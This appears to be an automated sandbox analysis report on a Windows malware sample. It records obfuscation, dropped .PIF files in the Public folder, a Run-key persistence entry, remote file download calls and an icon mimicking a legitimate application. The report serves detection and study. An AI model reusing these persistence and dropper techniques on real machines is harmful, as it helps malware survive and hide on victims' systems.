Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\colorcpl.exe Window detected: Number of UI elements: 12
Source: jlPBMMQbXC.exe Static file information: File size 1243648 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source: Binary string: easinvoker.pdbH source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E41E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E44F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

Data Obfuscation

barindex
Source: Yara match File source: 0.2.jlPBMMQbXC.exe.2c50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.jlPBMMQbXC.exe.23e65a8.0.unpack, type: UNPACKEDPE
Source: alpha.pif.6.dr Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02C6894C
Source: alpha.pif.6.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C7D2FC push 02C7D367h; ret 0_2_02C7D35F
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C563AE push 02C5640Bh; ret 0_2_02C56403
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C563B0 push 02C5640Bh; ret 0_2_02C56403
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C5C349 push 8B02C5C1h; ret 0_2_02C5C34E
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C7C378 push 02C7C56Eh; ret 0_2_02C7C566
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C5332C push eax; ret 0_2_02C53368
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C7D0AC push 02C7D125h; ret 0_2_02C7D11D
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6306C push 02C630B9h; ret 0_2_02C630B1
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6306B push 02C630B9h; ret 0_2_02C630B1
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C7D1F8 push 02C7D288h; ret 0_2_02C7D280
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C7D144 push 02C7D1ECh; ret 0_2_02C7D1E4
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6F108 push ecx; mov dword ptr [esp], edx 0_2_02C6F10D
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C56784 push 02C567C6h; ret 0_2_02C567BE
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C56782 push 02C567C6h; ret 0_2_02C567BE
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C5D5A0 push 02C5D5CCh; ret 0_2_02C5D5C4
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C5C56C push ecx; mov dword ptr [esp], edx 0_2_02C5C571
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C7C570 push 02C7C56Eh; ret 0_2_02C7C566
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6AADF push 02C6AB18h; ret 0_2_02C6AB10
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C68AD8 push 02C68B10h; ret 0_2_02C68B08
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6AAE0 push 02C6AB18h; ret 0_2_02C6AB10
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02CC4A50 push eax; ret 0_2_02CC4B20
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C5CBEC push 02C5CD72h; ret 0_2_02C5CD6A
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6886C push 02C688AEh; ret 0_2_02C688A6
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C5C9DE push 02C5CD72h; ret 0_2_02C5CD6A
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C66946 push 02C669F3h; ret 0_2_02C669EB
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C66948 push 02C669F3h; ret 0_2_02C669EB
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6790C push 02C67989h; ret 0_2_02C67981
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C65E7C push ecx; mov dword ptr [esp], edx 0_2_02C65E7E
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C62F60 push 02C62FD6h; ret 0_2_02C62FCE
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0447E47A push esi; ret 8_2_0447E483
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_0442169A push eax; ret 8_2_044216F4

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Selebzih.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29136EEB ShellExecuteW,URLDownloadToFileW, 8_2_29136EEB
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Selebzih.PIF Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_2914AB9E
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Selebzih Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Selebzih Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon306.png
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02C6AB1C
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
